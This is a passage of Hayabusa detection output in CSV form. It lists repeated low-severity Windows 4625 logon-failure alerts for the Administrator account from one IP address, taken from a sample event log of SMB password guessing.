NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: 